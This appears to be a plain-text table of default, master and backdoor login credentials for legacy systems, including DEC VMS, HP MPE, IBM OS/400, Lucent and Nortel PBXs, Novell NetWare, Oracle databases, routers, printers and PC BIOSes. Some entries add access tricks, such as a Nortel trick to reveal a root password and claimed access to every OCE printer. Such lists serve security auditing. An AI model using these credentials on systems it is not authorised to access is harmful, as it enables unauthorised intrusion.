Digital Equipment VMS Multi NEWS NEWS
Digital Equipment VMS Multi OPERVAX OPERVAX
Digital Equipment VMS Multi POSTMASTER POSTMASTER
Digital Equipment VMS Multi PRIV PRIV
Digital Equipment VMS Multi REPORT REPORT
Digital Equipment VMS Multi RJE RJE
Digital Equipment VMS Multi STUDENT STUDENT
Digital Equipment VMS Multi SYS SYS
Digital Equipment VMS Multi SYSMAINT SYSMAINT
Digital Equipment VMS Multi SYSMAINT SERVICE
Digital Equipment VMS Multi SYSMAINT DIGITAL
Digital Equipment VMS Multi SYSTEM SYSTEM
Digital Equipment VMS Multi SYSTEM MANAGER
Digital Equipment VMS Multi SYSTEM OPERATOR
Digital Equipment VMS Multi SYSTEM SYSLIB
Digital Equipment VMS Multi SYSTEST UETP
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST_CLIG
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST
Digital Equipment VMS Multi TELEDEMO TELEDEMO
Digital Equipment VMS Multi TEST TEST
Digital Equipment VMS Multi UETP UETP
Digital Equipment VMS Multi USER PASSWORD
Digital Equipment VMS Multi USERP USERP
Digital Equipment VMS Multi VAX VAX
Digital Equipment VMS Multi VMS VMS
Digital Equipment DEC-10 Multi 1 syslib Admin
Digital Equipment DEC-10 Multi 1 operator Admin
Digital Equipment DEC-10 Multi 1 manager Admin
Digital Equipment DEC-10 Multi 2 maintain Admin
Digital Equipment DEC-10 Multi 2 syslib Admin
Digital Equipment DEC-10 Multi 2 manager Admin
Digital Equipment DEC-10 Multi 2 operator Admin
Digital Equipment DEC-10 Multi 30 games User
Digital Equipment DEC-10 Multi 5 games User
Digital Equipment DEC-10 Multi 7 maintain User
Digital Equipment DecServer Multi n/a ACCESS Admin
Digital Equipment DecServer Multi n/a SYSTEM Admin
Digital Equipment IRIS Multi accounting accounting Admin
Digital Equipment IRIS Multi boss boss Admin
Digital Equipment IRIS Multi demo demo User
Digital Equipment IRIS Multi manager manager Admin
Digital Equipment IRIS Multi PDP11 PDP11 User
Digital Equipment IRIS Multi PDP8 PDP8 User
Digital Equipment IRIS Multi software software User
Digital Equipment PC BIOS Console n/a komprie Admin
Digital Equipment RSX Multi 1.1 SYSTEM Admin
Digital Equipment RSX Multi BATCH BATCH User
Digital Equipment RSX Multi SYSTEM MANAGER Admin
Digital Equipment RSX Multi SYSTEM SYSTEM Admin
Digital Equipment RSX Multi USER USER User
Digital Equipment Terminal Server Port 7000 n/a access User
Digital Equipment Terminal Server Port 7000 n/a system Admin
Digital Equipment VMS Multi ALLIN1 ALLIN1
Digital Equipment VMS Multi ALLIN1MAIL ALLIN1MAIL
Digital Equipment VMS Multi ALLINONE ALLINONE
Digital Equipment VMS Multi BACKUP BACKUP
Digital Equipment VMS Multi DCL DCL
Digital Equipment VMS Multi DECMAIL DECMAIL
Digital Equipment VMS Multi DECNET DECNET
Digital Equipment VMS Multi DECNET NONPRIV
Digital Equipment VMS Multi DECNET DECNET
Dynix Library Systems Dynix Multi SETUP (none) Admin
Dynix Library Systems Dynix Multi LIBRARY (none) User
Dynix Library Systems Dynix Multi circ User
Efficient Speedstream DSL Telnet n/a admin Admin
Efficient Networks Speedstream 5711 Teledanmark version (only .dk) Console n/a 4getme2 Admin for all your TDC router needs
Efficient Networks EN 5861 Telnet login admin Admin
Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a cisco Admin
Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a (none) Admin
enCAD XPO Multi n/a (none) Admin
Enox PC BIOS Console n/a xo11nE Admin
Epox PC BIOS Console n/a central Admin
Ericsson Ericsson Acc netman netman
ericsson md110 pabx up-to-bc9 Multi (none) help varies depending on config minimal list access by default
Extreme Networks Switches admin (none) Admin
Extreme Networks Switches Multi admin (none) Admin submitted by Eastman Rivai
Extreme Networks Switches Multi admin (none) Admin
Extreme Networks All Switches Multi admin (none) Admin Submitted by Eastman Rivai
Flowpoint 2200 SDSL Telnet admin admin Admin
Flowpoint DSL 2000 Telnet admin admin Admin
Flowpoint DSL Telnet n/a password Admin Installed by Covad
Flowpoint Flowpoint/2000 ADSL Telnet n/a (none) Admin
Flowpoint 100 IDSN Telnet admin admin Admin
Flowpoint 40 IDSL Telnet admin admin Admin
Freetech PC BIOS Console n/a Posterie Admin
Galacticomm Major BBS Multi Sysop Sysop Admin
glFtpD glFtpD all Console glftpd glftpd Admin
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP187
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP189
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP196
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR INTX3
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR NETBASE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR REGO
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR RJE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CONV
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR DISC
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYSTEM
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi PCUSER SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi R**CMON SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi SPOOLMAN HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi WP HPOFFICE
Hewlett-Packard Vectra Console n/a hewlpack Admin
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HPOFFICE DATA
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HP
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MGR
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SERVICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MANAGER
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPP187 SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD LOTUS
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPWORD PUB
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPONLY
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MANAGER.SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MGR.SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO FIELD.SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO OP.OPERATOR
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MAIL
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL REMOTE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MPE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TCH
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CAROLIAN
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR XLSERVER
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPDESK
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CCC
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CNAS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR WORD
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ROBELLE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPONLY
hp sa7200 Multi admin admin Admin
hp sa7200 Multi admin (none) Admin
IBM VM/CMS Multi DEMO2 (none)
IBM VM/CMS Multi DEMO3 (none)
IBM VM/CMS Multi DEMO4 (none)
IBM VM/CMS Multi DIRECT (none)
IBM VM/CMS Multi DIRMAINT (none)
IBM VM/CMS Multi DISKCNT (none)
IBM VM/CMS Multi EREP (none)
IBM VM/CMS Multi FSFADMIN (none)
IBM VM/CMS Multi FSFTASK1 (none)
IBM VM/CMS Multi FSFTASK2 (none)
IBM VM/CMS Multi GCS (none)
IBM VM/CMS Multi IDMS (none)
IBM VM/CMS Multi IDMSSE (none)
IBM VM/CMS Multi IIPS (none)
IBM VM/CMS Multi IPFSERV (none)
IBM VM/CMS Multi ISPVM (none)
IBM VM/CMS Multi IVPM1 (none)
IBM VM/CMS Multi IVPM2 (none)
IBM VM/CMS Multi MAINT (none)
IBM VM/CMS Multi MOESERV (none)
IBM VM/CMS Multi NEVIEW (none)
IBM VM/CMS Multi OLTSEP (none)
IBM VM/CMS Multi OP1 (none)
IBM VM/CMS Multi OPERATNS (none)
IBM VM/CMS Multi OPERATOR (none)
IBM VM/CMS Multi PDMREMI (none)
IBM VM/CMS Multi PENG (none)
IBM VM/CMS Multi PROCAL (none)
IBM VM/CMS Multi PRODBM (none)
IBM VM/CMS Multi PROMAIL (none)
IBM VM/CMS Multi PSFMAINT (none)
IBM VM/CMS Multi PVM (none)
IBM VM/CMS Multi RDM470 (none)
IBM VM/CMS Multi ROUTER (none)
IBM VM/CMS Multi RSCS (none)
IBM VM/CMS Multi RSCSV2 (none)
IBM VM/CMS Multi SAVSYS (none)
IBM VM/CMS Multi SFCMI (none)
IBM VM/CMS Multi SFCNTRL (none)
IBM VM/CMS Multi SMART (none)
IBM VM/CMS Multi SQLDBA (none)
IBM VM/CMS Multi SQLUSER (none)
IBM VM/CMS Multi SYSADMIN (none)
IBM VM/CMS Multi SYSCKP (none)
IBM VM/CMS Multi SYSDUMP1 (none)
IBM VM/CMS Multi SYSERR (none)
IBM VM/CMS Multi SYSWRM (none)
IBM VM/CMS Multi TDISK (none)
IBM VM/CMS Multi TEMP (none)
IBM VM/CMS Multi TSAFVM (none)
IBM VM/CMS Multi VASTEST (none)
IBM VM/CMS Multi VM3812 (none)
IBM VM/CMS Multi VMARCH (none)
IBM VM/CMS Multi VMASMON (none)
IBM VM/CMS Multi VMASSYS (none)
IBM VM/CMS Multi VMBACKUP (none)
IBM VM/CMS Multi VMBSYSAD (none)
IBM VM/CMS Multi VMMAP (none)
IBM VM/CMS Multi VMTAPE (none)
IBM VM/CMS Multi VMTLIBR (none)
IBM VM/CMS Multi VMUTIL (none)
IBM VM/CMS Multi VSEIPO (none)
IBM VM/CMS Multi VSEMAINT (none)
IBM VM/CMS Multi VSEMAN (none)
IBM VM/CMS Multi VTAM (none)
IBM VM/CMS Multi VTAMUSER (none)
IBM 8237 Multi I5rDv2b2JjA8Mm A52896nG93096a Admin
IBM 8225 Multi I5rDv2b2JjA8Mm A52896nG93096a Admin
IBM AIX Multi guest (none) User
IBM AIX Multi guest guest User
IBM Ascend OEM Routers Telnet n/a ascend Admin
IBM OS/400 Multi 11111111 11111111
IBM OS/400 Multi 22222222 22222222
IBM OS/400 Multi ibm password
IBM OS/400 Multi ibm 2222
IBM OS/400 Multi ibm service
IBM OS/400 Multi qpgmr qpgmr
IBM OS/400 Multi qsecofr qsecofr
IBM OS/400 Multi qsecofr 11111111
IBM A21m Multi n/a (none) Admin
IBM 390e Multi n/a admin Admin
ibm a20m Multi n/a admin Admin
IBM OS/400 Multi qsecofr 22222222
IBM OS/400 Multi qserv qserv
IBM OS/400 Multi qsrv qsrv
IBM OS/400 Multi qsrvbas qsrvbas
IBM OS/400 Multi qsvr qsvr
IBM OS/400 Multi qsvr ibmcel
IBM OS/400 Multi qsysopr qsysopr
IBM OS/400 Multi quser quser
IBM OS/400 Multi secofr secofr
IBM AIX 4.X Multi admin admin User
IBM PC BIOS Console n/a IBM Admin
IBM PC BIOS Console n/a MBIU0 Admin
IBM PC BIOS Console n/a sertafu Admin
ibm 600x Multi n/a admin Admin
IBM POS CMOS Console ESSEX
IBM POS CMOS Console IPC
IBM VM/CMS Multi $ALOC$ (none)
IBM VM/CMS Multi ADMIN (none)
IBM VM/CMS Multi AP2SVP (none)
IBM VM/CMS Multi APL2PP (none)
IBM VM/CMS Multi AUTOLOG1 (none)
IBM VM/CMS Multi BATCH (none)
IBM VM/CMS Multi BATCH1 (none)
IBM VM/CMS Multi BATCH2 (none)
IBM VM/CMS Multi CCC (none)
IBM VM/CMS Multi CM**ATCH (none)
IBM VM/CMS Multi CMSUSER (none)
IBM VM/CMS Multi CPNUC (none)
IBM VM/CMS Multi CPRM (none)
IBM VM/CMS Multi CSPUSER (none)
IBM VM/CMS Multi CVIEW (none)
IBM VM/CMS Multi DATAMOVE (none)
IBM VM/CMS Multi DEMO1 (none)
Intel Shiva Multi root (none) Admin
Intel Express 9520 Router Multi NICONEX NICONEX User
Intel Shiva Lanrovers Multi root (none) Admin
Intel Shiva Multi Guest (none) User
intel NetporrExpress Multi (none) (none) Admin
Intel Express 520T Switch Multi setup setup User
intel lan rover 6.7 Console root admin Admin
Interbase Interbase Database Server All Multi SYSDBA masterkey Admin
intex organizer Multi n/a (none) Admin
iso sistemi winwork Multi n/a (none) Admin
Iwill PC BIOS Console n/a iwill Admin
JD Edwards WorldVision/OneWorld All(?) Console JDE JDE Admin/SECOFR
JDS Microprocessing Hydra 3000 r2.02 Console hydrasna (none) Admin http://www.hydrasystems.com/h3kdocs/H3R25C04.pdf
Jetform Jetform Design HTTP Jetform (none) Admin
JetWay PC BIOS Console n/a spooml Admin
Joss Technology PC BIOS Console n/a technolgi Admin
Joss Technology PC BIOS Console n/a 57gbzb Admin
kaptest usmle HTTP admin (none) Admin
Kyocera EcoLink 7.2 HTTP n/a PASSWORD Admin
Kyocera Telnet Server IB-20/21 multi root root Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin
Lantronix Lantronix Terminal TCP 7000 n/a lantronix Admin
Leading Edge PC BIOS Console n/a MASTER Admin
Linksys DSL Telnet n/a admin Admin
Linksys EtherFast Cable/DSL Router Multi Administrator admin Admin
Linksys Linksys Router DSL/Cable HTTP (none) admin Admin
Linux Slackware Multi snake (none) User
Linux Slackware Multi satan (none) User
Linux UCLinux for UCSIMM Multi root uClinux Admin
Linux Slackware Multi gonzo (none) User
Livingston IRX Router Telnet !root (none)
Livingston Livingston Portmaster 3 Telnet !root (none)
Livingston Officerouter Telnet !root (none)
Lucent System 75 Multi browse looker
Lucent System 75 Multi craft craft
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi cust custpw
Lucent System 75 Multi enquiry enquirypw
Lucent System 75 Multi field support
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads inads
Lucent System 75 Multi init initpw
Lucent System 75 Multi locate locatepw
Lucent System 75 Multi maint maintpw
Lucent System 75 Multi maint rwmaint
Lucent System 75 Multi nms nmspw
Lucent System 75 Multi rcust rcustpw
Lucent System 75 Multi support supportpw
Lucent System 75 Multi tech field
Lucent B-STDX9000 Multi (any 3 characters) cascade
Lucent B-STDX9000 debug mode n/a cascade
Lucent B-STDX9000 SNMP readwrite n/a cascade
Lucent CBX 500 Multi (any 3 characters) cascade
Lucent CBX 500 debug mode n/a cascade
Lucent CBX 500 SNMP readwrite n/a cascade
Lucent GX 550 Multi (any 3 characters) cascade
Lucent GX 550 debug mode n/a cascade
Lucent GX 550 SNMP readwrite n/a cascade
Lucent MAX-TNT Multi admin Ascend
Lucent PSAX 1200 and below Multi root ascend
Lucent PSAX 1250 and above Multi readwrite lucenttech1
Lucent PSAX 1250 and above Multi readonly lucenttech2
Lucent System 75 Multi bciim bciimpw
Lucent System 75 Multi bcim bcimpw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcnas bcnaspw
Lucent System 75 Multi blue bluepw
Lucent System 75 Multi browse browsepw
M Technology PC BIOS Console n/a mMmM Admin
MachSpeed PC BIOS Console n/a sp99dd Admin
Macromedia Dreamweaver FTP n/a admin Guest
Magic-Pro PC BIOS Console n/a prost Admin
Megastar PC BIOS Console n/a star Admin
Mentec Micro/RSX Multi MICRO RSX Admin
MERCURY 234234 234234 SNMP Administrator admin Admin
MERCURY KT133A/686B SNMP Administrator admin Admin
Micron PC BIOS Console n/a sldkj754 Admin
Micron PC BIOS Console n/a xyzall Admin
Micronics PC BIOS Console n/a dn_04rjc Admin
Microplex Print Server Telnet root root Admin
microRouter 900i Console/Multi n/a letmein Admin
Microsoft Windows NT Multi Guest (none) User
Microsoft Windows NT Multi User User User
Microsoft SQL Server Multi sa (none)
Microsoft Windows NT Multi Guest Guest User
Microsoft Windows NT Multi IS_$hostname (same) User hostname = your server name
Microsoft Windows NT Multi (null) (none) User Redbutton Hole
Microsoft Windows NT Multi Administrator Administrator Admin
Microsoft Windows NT Multi Administrator (none) Admin
Mintel Mintel PBX n/a SYSTEM Admin
Motorola Cablerouter Telnet cablecom router Admin
mro software maximo v4.1 Multi SYSADM sysadm Admin
NCR NCR UNIX Multi ncrm ncrm Admin
Netgear RT314 HTTP and Telnet admin 1234 Admin
NetGenesis NetAnalysis Web Reporting HTTP naadmin naadmin Admin
Netopia Netopia 9500 Telnet netopia netopia Admin
Netopia Netopia 7100 Telnet (none) (none) Admin
Netport Express 10/100 multi setup setup Admin
Netscreen ns-25 Multi n/a (none) Admin
Netscreen Firewall multi netscreen netscreen Admin
NeXT NeXTStep Multi signa signa User
NeXT NeXTStep Multi me (none) User
NeXT NeXTStep Multi root NeXT Admin
Nimble PC BIOS Console n/a xdfk9874t3 Admin
Nortel Meridian Link Multi disttech 4tas engineer account
Nortel Meridian Link Multi maint maint Maintenance account
Nortel Meridian Link Multi mlusr mlusr user account
Nortel Remote Office 9150 Client admin root Admin
Nortel Accelar (Passport) 1000 series routing switches Multi l2 l2 Layer 2 Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi l3 l3 Layer 3 (and layer 2) Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi ro ro Read Only
Nortel Accelar (Passport) 1000 series routing switches Multi rw rw Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi rwa rwa Read Write All
Nortel Extranet Switches Multi admin setup Admin
Nortel Baystack 350-24T Telnet n/a secure Admin
Nortel Meridian PBX Serial login 0000 AUTH codes in LD 8
Nortel Meridian PBX Serial login 1111 AUTH codes in LD 8
Nortel Meridian PBX Serial login 8429 AUTH codes in LD 8
Nortel Meridian PBX Serial spcl 0000 AUTH codes in LD 8
Nortel Meridian MAX Multi service smile general engineer account
Nortel Meridian MAX Multi root 3ep5w2u Admin
Nortel Matra 6501 PBX Console (none) 0000 Admin
Nortel Meridian MAX Multi maint ntacdmax Maintenance account
Nortel Meridian CCR Multi service smile general engineer account
Nortel Meridian CCR Multi disttech 4tas engineer account enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) - may be twice to see root password in clear
Nortel Meridian CCR Multi maint maint Maintenance account
Nortel Meridian CCR Multi ccrusr ccrusr User account
Nortel Meridian Multi n/a (none) Admin
Nortel Meridian Link Multi service smile general engineer account
Novell Netware Multi BACKUP BACKUP
Novell Netware Multi CHEY_ARCHSVR CHEY_ARCHSVR
Novell Netware Multi CHEY_ARCHSVR (none)
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSER
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWORKS
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUESTGUEST
Novell Netware Multi GUEST GUESTGUE
Novell Netware Multi GUEST GUEST
Novell Netware Multi GUEST (none)
Novell Netware Multi HPLASER (none)
Novell Netware Multi HPLASER HPLASER
Novell Netware Multi LASER (none)
Novell Netware Multi LASER LASER
Novell Netware Multi LASERWRITER LASERWRITER
Novell Netware Multi LASERWRITER (none)
Novell Netware Multi MAIL (none)
Novell iChain 1.5 Console (none) san fran 8 Admin Debug level access
Novell iChain 2.0 Console (none) cr0wmt 911 Admin Debug level access
Novell Netware Multi MAIL MAIL
Novell Netware Multi POST (none)
Novell Netware Multi POST POST
Novell Netware Multi PRINT (none)
Novell Netware Multi PRINT PRINT
Novell Netware Multi PRINTER (none)
Novell Netware Multi PRINTER PRINTER
Novell Netware Multi ROOT (none)
Novell Netware Multi ROOT ROOT
Novell Netware Multi ROUTER (none)
Novell Netware Multi SABRE (none)
Novell Netware Multi SUPERVISOR NETFRAME
Novell Netware Multi SUPERVISOR NFI
Novell Netware Multi SUPERVISOR NF
Novell Netware Multi SUPERVISOR HARRIS
Novell Netware Multi SUPERVISOR SUPERVISOR
Novell Netware Multi SUPERVISOR (none)
Novell Netware Multi SUPERVISOR SYSTEM
Novell Netware Multi TEST TEST
Novell Netware Multi TEST (none)
Novell Netware Multi USER_TEMPLATE (none)
Novell Netware Multi USER_TEMPLATE USER_TEMPLATE
Novell Netware Multi WANGTEK (none)
Novell Netware Multi WANGTEK WANGTEK
Novell Netware Multi WINDOWS_PASSTHRU WINDOWS_PASSTHRU
Novell Netware Multi WINDOWS_PASSTHRU (none)
Novell Netware Multi WINSABRE SABRE
Novell Netware Multi WINSABRE WINSABRE
Novell Groupwise 5.5 Enhancement Pack HTTP servlet manager Servlet Mgr URI: /servlet/ServletManager
Novell Groupwise 6.0 HTTP servlet manager Servlet Mgr URI: /servlet/ServletManager
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHIVIST
Novell Netware Multi BACKUP (none)
Nurit PC BIOS Console $system (none) Admin
OCE Printers Hardware HTTP n/a 0 and the number of OCE printer Admin You can gain acsess to every OCE printer..
OCE Printers Hardware HTTP n/a 0 and the number of OCE printer Admin You can gain acsess to every OCE printer..
Optus Counter-Strike 1.3 Multi Administrator admin Admin password
Oracle Oracle RDBMS 8i Multi AQDEMO AQDEMO
Oracle Oracle RDBMS 7 and 8 Multi APPS APPS
oracle 8.1.7 Multi n/a (none) Admin
Oracle Oracle RDBMS 7 and 8 Multi AURORA@ORB@UNAUTHENTICATED INVALID
Oracle Oracle RDBMS 7 and 8 Multi AURORA$ORB$UNAUTHENTICATED INVALID
Oracle Web DB HTTP webdb webdb Admin Running on port 81/TCP (Nicolas Gregoire)
Oracle Oracle RDBMS 7 and 8 Multi BLAKE PAPER
Oracle Oracle RDBMS 8i Multi CATALOG CATALOG
Oracle Oracle RDBMS 8i Multi CDEMO82 CDEMO82
Oracle Oracle RDBMS 8i Multi CDEMOCOR CDEMOCOR
Oracle Oracle RDBMS 8i Multi CDEMOUCB CDEMOUCB
Oracle Oracle RDBMS 8i Multi CDEMORID CDEMORID
Oracle Oracle RDBMS 8i Multi FINANCE FINANCE All Privileges
Oracle Oracle RDBMS 7 and 8 Multi CLARK CLOTH
Oracle Oracle RDBMS 8i Multi COMPANY COMPANY All Privileges
Oracle Oracle RDBMS 7 and 8 Multi CTXDEMO CTXDEMO
Oracle Oracle RDBMS 7 and 8 Multi CTXSYS CTXSYS DBA
Oracle Oracle RDBMS 8i Multi SYSMAN oem_temp DBA created by Oracle Enterprise Manager
Oracle Oracle RDBMS 7 and 8 Multi CTXSYS (none)
Oracle Oracle RDBMS 7 and 8 Multi DBSNMP DBSNMP RESOURCE and CONNECT roles
Oracle Oracle RDBMS 7 and 8 Multi DEMO DEMO
Oracle Oracle RDBMS 8i Multi DEMO8 DEMO8
Oracle Oracle RDBMS 8i Multi EMP EMP
Oracle Oracle RDBMS 8i Multi EVENT EVENT DBA
Oracle Oracle RDBMS 8i Multi FND FND
Oracle Oracle RDBMS 8i Multi GPFD GPFD
Oracle Oracle RDBMS 8i Multi GPLD GPLD
Oracle Oracle RDBMS 7 and 8 Multi JONES STEEL
Oracle Oracle RDBMS 7 and 8 Multi MDSYS MDSYS All Privileges with Admin
Oracle Oracle RDBMS 8i Multi MFG MFG All Privileges
Oracle Oracle RDBMS 8i Multi MILLER MILLER
Oracle Oracle RDBMS 8i Multi MMO2 MMO2
Oracle Oracle RDBMS 8i Linux Multi MODTEST YES DBA
Oracle Oracle RDBMS 8i Multi MOREAU MOREAU
Oracle Oracle RDBMS 8i WinNT Multi MTYSYS MTYSYS
Oracle Oracle RDBMS 7 and 8 Multi NAMES NAMES
Oracle Oracle RDBMS 8i Multi OCITEST OCITEST
Oracle Oracle RDBMS 7 and 8 Multi ORDPLUGINS ORDPLUGINS
Oracle Oracle RDBMS 7 and 8 Multi ORDSYS ORDSYS
Oracle Oracle RDBMS 7 and 8 Multi OUTLN OUTLN
Oracle Oracle RDBMS 8i Multi PO PO DBA
Oracle Oracle RDBMS 8i Multi POWERCARTUSER POWERCARTUSER
Oracle Oracle RDBMS 8i Multi PRIMARY PRIMARY
Oracle Oracle RDBMS 8i Multi PUBSUB PUBSUB DBA
Oracle Oracle RDBMS 8i WinNT Multi RE RE
Oracle Oracle RDBMS 8i WinNT Multi RMAIL RMAIL
Oracle Oracle RDBMS 7 and 8 Multi RMAN RMAN created by ordisys.sql
Oracle Oracle RDBMS 8i WinNT Multi SAMPLE SAMPLE DBA
Oracle Oracle RDBMS 7 and 8 Multi SCOTT TIGER
Oracle Oracle RDBMS 8i Multi SECDEMO SECDEMO
Oracle Oracle RDBMS 7 and 8 Multi SYS CHANGE_ON_INSTALL DBA +
Oracle Oracle RDBMS 7 and 8 Multi SYSADM SYSADM
Oracle Oracle RDBMS 7 and 8 Multi SYSTEM MANAGER
Oracle Oracle RDBMS 7 and 8 Multi TRACESRV TRACE
Oracle Oracle RDBMS 8i Multi TSDEV TSDEV
Oracle Oracle RDBMS 8i Multi TSUSER TSUSER
Oracle Oracle RDBMS 8i Multi USER0 USER0
Oracle Oracle RDBMS 8i Multi USER1 USER1
Oracle Oracle RDBMS 8i Multi USER2 USER2
Oracle Oracle RDBMS 8i Multi USER3 USER3
Oracle Oracle RDBMS 8i Multi USER4 USER4
Oracle Oracle RDBMS 8i Multi USER5 USER5
Oracle Oracle RDBMS 8i Multi USER6 USER6
Oracle Oracle RDBMS 8i Multi USER7 USER7
Oracle Oracle RDBMS 8i Multi USER8 USER8
Oracle Oracle RDBMS 8i Multi USER9 USER9
Oracle Oracle RDBMS 8i Multi VRR1 VRR1 DBA
Oracle Personal Oracle 8 Multi PO8 PO8
Oracle Oracle RDBMS 8i Multi AQUSER AQUSER
Oracle Oracle RDBMS 7 and 8 Multi ADAMS WOOD
Oracle Oracle RDBMS 7 and 8 Multi APPLSYS APPLSYS
Osicom NETPrint 1000E/D Telnet Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet Manager Manager Admin
Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet Manager Manager Admin
Osicom NETPrint 1500E/N Telnet Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/D Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/N Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/N Telnet sysadm sysadm Admin
Osicom Osicom Plus T1/PLUS 56k Telnet write private
Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin
Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin
Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin
Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User
Osicom NETCommuter Remote Access Server Telnet echo echo User
Osicom NETCommuter Remote Access Server Telnet guest guest User
